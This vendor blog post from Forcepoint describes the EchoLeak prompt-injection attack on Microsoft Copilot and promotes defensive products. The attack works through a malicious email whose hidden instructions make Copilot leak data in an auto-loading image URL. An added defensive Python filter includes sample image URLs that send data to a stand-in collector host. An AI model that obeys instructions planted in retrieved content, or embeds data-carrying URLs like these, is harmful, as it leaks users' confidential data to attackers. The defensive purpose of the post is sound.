
EchoLeak is one of the first high-profile GenAI exploits and it surely won’t be the last. This attack exposed how a malicious email could manipulate Microsoft Copilot into stealing sensitive data and exfiltrating it to a server controlled by the attacker.

This illustrates the urgent need for a solid data security strategy. Organizations that don’t have one will find themselves unprepared for the unique risks that GenAI tools like Copilot introduce. The attack surface for data breaches is expanding rapidly, and AI is accelerating that risk.

How the EchoLeak Attack Works

1. Malicious Email Delivery:
An attacker sends a crafted email with embedded instructions designed to exploit LLM behavior.

Fig. 1 -  Malicious email sent


2. Prompt Injection via User Action:
When a user interacts with Copilot, the LLM processes the email, triggers the hidden instructions and prepares sensitive data for exfiltration.

Fig. 2 -  GenAI RAG retrieves malicious email


3. Auto-Triggered Web Request:
The sensitive data is sent via a web request hidden in an image. The browser loads the image automatically, delivering the payload to the attacker's server.

Fig. 3 -  GenAI leaks sensitive data to the attacker
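
A defensive counterpart to step 3, as an added example that is not from the original article or from any Forcepoint product: a Python filter that strips images from an LLM response unless the image host is on an allowlist, so the client never issues the automatic request. It assumes the response is rendered as Markdown and covers both inline and reference-style image syntax, which goes beyond the single image case described above; the host names, function names and sample response are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only hosts rendered images may load from (placeholder name).
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

INLINE_IMG = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
REF_IMG = re.compile(r"!\[([^\]]*)\](?:\[([^\]]*)\])?(?!\()")
REF_DEF = re.compile(r"^ {0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$", re.M)

def host_allowed(url):
    """True only for https URLs whose host is on the allowlist (fails closed)."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS

def sanitize_response(markdown):
    """Return (safe_markdown, blocked_urls) for one LLM response."""
    blocked = []
    refs = {m[1].lower(): m[2] for m in REF_DEF.finditer(markdown)}

    def replace(alt, url, original):
        if url is None or host_allowed(url):
            return original
        blocked.append(url)
        return f"[image removed: {alt}]"

    # Inline form: ![alt](url)
    out = INLINE_IMG.sub(lambda m: replace(m[1], m[2], m[0]), markdown)
    # Reference forms: ![alt][label], ![alt][] and ![alt]
    out = REF_IMG.sub(
        lambda m: replace(m[1], refs.get((m[2] or m[1]).lower()), m[0]), out)
    # Drop the definitions that pointed at blocked URLs.
    out = REF_DEF.sub(lambda m: "" if m[2] in blocked else m[0], out)
    return out, blocked

# Constructed sample: a response that carries data in two image URLs.
SAMPLE = (
    "Here is the summary.\n"
    "![logo](https://static.example.com/logo.png)\n"
    "![chart](https://collector.invalid/p.png?d=Q4-forecast)\n"
    "![status][r1]\n\n"
    "[r1]: https://collector.invalid/q.png?d=api-key-123\n"
)
```

The returned `blocked_urls` list is worth logging: a response that tries to load an image from an unlisted host with data in the query string is a useful detection signal on its own.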

Why Traditional Defenses Fall Short

The EchoLeak exploit exposes a critical gap in traditional data security: most defenses are reactive, taking action only after an attacker is already attempting to move sensitive data. That’s where Data Loss Prevention (DLP) plays a key role—blocking exfiltration attempts in real time across email, web and endpoint channels.

But reactive controls alone aren’t enough.

To truly reduce the blast radius of GenAI-driven breaches, organizations also need proactive defenses. That’s where Forcepoint Data Security Posture Management (DSPM) and Data Detection and Response (DDR) come in. These tools automatically discover, classify, and clean up redundant, outdated, and trivial (ROT) data, and close access control gaps before attackers ever get a chance to exploit them.

By combining proactive measures like DSPM and DDR with reactive DLP enforcement across cloud, hybrid, and endpoint environments, organizations can both shrink the amount of data exposed to large language models and stop data from leaving in the first place. This unified strategy is essential to defending against fast-moving threats like EchoLeak.

Adding Forcepoint Secure Web Gateway (SWG) and Email Security capabilities strengthens your overall threat prevention strategy. These tools not only extend Data Loss Prevention (DLP) coverage to key exfiltration channels such as web and email, they also activate Forcepoint ACE’s advanced threat protection to detect and stop malicious activity at the earliest stage, before an attacker can gain a foothold.

This combination of proactive threat prevention and real-time DLP enforcement helps neutralize risks across the entire kill chain. To understand how this unified approach defends against advanced GenAI-enabled exploits like EchoLeak, and the emerging class of threats known as "LLM Scope Violations," let’s begin with the initial attack vector: email.


Stage 1: Stop Malicious Emails

Fig. 4 - Forcepoint Email Security stops the malicious email
 

The initial attack vector is email, which is still the most common attack vector for cyberattacks. A strong email security gateway is critical. A good email security solution offers anti-malware, anti-phishing and malicious URL detection to block exploits like EchoLeak early.

Integrating your email gateway with industry-leading DLP capabilities ensures sensitive data can't be leaked via outbound emails, whether sent by an attacker or accidentally by an employee. This combined approach helps neutralize threats before they ever interact with LLMs.

Stage 2: Contain the Blast Radius of LLM Data Access

Fig. 5 - Forcepoint DSPM reduces the blast radius
 

To reduce the risk, organizations need tools that can identify and minimize unnecessary exposure. Forcepoint DSPM and DDR solutions are designed specifically for this challenge. These tools automatically scan and classify sensitive data, monitor its usage and also eliminate redundant, outdated, and trivial (ROT) data that increases the impact of a breach.

Many enterprises also face issues with over-permissioned data—files or records set to "public" or "company-wide" access. DSPM and DDR help reduce this exposure by enforcing least-privilege principles and correcting access control gaps in unstructured data.

Without these controls in place, users often store extra copies or outdated versions of files, which unnecessarily expands the data footprint available to LLMs. This increases the blast radius in the event of a successful attack.

For LLMs supported by our API, such as ChatGPT Enterprise, we can even control the prompts and responses to prevent such an attack from happening at the LLM itself.

Stage 3: Block Data Exfiltration via the Web


Fig. 6 - Forcepoint DLP blocks sensitive data exfiltration, SWG blocks connection to C&C server
 

The final phase of the EchoLeak exploit involves data exfiltration over the web, which is one of the most common and challenging attack vectors to defend against. This underscores the importance of having strong web protection as part of a modern data security strategy.

Forcepoint DLP prevents sensitive data from leaving the organization through web channels, whether using endpoint DLP on managed devices or network DLP for broader coverage. However, Secure Web Gateway (SWG) provides critical additional value. Unlike endpoint DLP, which requires an agent, SWG can apply in-line DLP to web traffic from unmanaged devices or guest Wi-Fi, where agents can't be deployed. SWG also enables more granular control than network DLP by allowing policies based on web categories, specific websites, or user groups. This makes it possible to apply different access and data protection rules depending on the risk level of the destination or the role of the user.

A strong SWG also helps identify and block connections to malicious domains, such as the hidden GET request used in the EchoLeak exploit. One key capability is the ability to distinguish between corporate-sanctioned infrastructure-as-a-service (IaaS) environments and personal or unsanctioned instances. This helps prevent sensitive data from being moved to unauthorized cloud services on platforms like Microsoft Azure, AWS or other IaaS providers.

Since email and web channels are among the most frequently used paths for data exfiltration, integrating DLP with both email and web security creates a unified and consistent layer of protection. This approach ensures data security policies are enforced across cloud applications, endpoints, email systems, and web traffic, significantly reducing the risk of data loss.

Protect Your Data Everywhere with Forcepoint

Talk to an expert today to explore the Forcepoint Data Security Everywhere approach to see how a unified approach can protect your organization against emerging GenAI exploits like EchoLeak and the others that will surely follow. Or sign up today for a free Data Risk Assessment.

    Corey Kiesewetter

    Corey Kiesewetter is Forcepoint’s Sr. Product Manager for cloud security products, with a focus on data security and Zero Trust.  Corey has been directly helping IT practitioners realize best practices in datacenter operations the past decade and holds a degree in Philosophy from the University of Texas.
